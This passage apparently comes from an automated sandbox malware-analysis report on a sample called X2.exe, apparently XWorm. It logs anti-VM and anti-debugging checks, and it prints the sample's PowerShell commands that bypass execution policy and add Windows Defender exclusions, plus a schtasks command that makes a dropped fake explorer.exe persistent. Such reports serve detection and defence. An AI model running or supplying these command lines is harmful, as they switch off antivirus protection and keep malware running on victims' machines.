Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596761s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596637s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596418s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -594983s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -594874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe TID: 6248	Thread sleep time: -594545s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104	Thread sleep count: 7449 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104	Thread sleep count: 2219 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128	Thread sleep count: 7264 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128	Thread sleep count: 2348 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3400	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1400	Thread sleep count: 8055 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 628	Thread sleep count: 1489 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2336	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 3764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2636	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\X2.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\X2.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597545	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597325	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597201	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596761	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596637	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596418	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594983	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Thread delayed: delay time: 594545	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477

Source: X2.exe, 00000003.00000002.2558218790.000000001B9FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMS
Source: explorer.exe.3.dr	Binary or memory string: vmware

Source: C:\Users\user\Desktop\X2.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\X2.exe

Code function: 3_2_00007FFE7E34737A CheckRemoteDebuggerPresent,

3_2_00007FFE7E34737A

Source: C:\Users\user\Desktop\X2.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\X2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\X2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\X2.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'

Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X2.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"	Jump to behavior

Source: X2.exe, 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: X2.exe, 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: X2.exe, 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: X2.exe, 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: X2.exe, 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: X2.exe, type: SAMPLE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

Source: C:\Users\user\Desktop\X2.exe	Queries volume information: C:\Users\user\Desktop\X2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
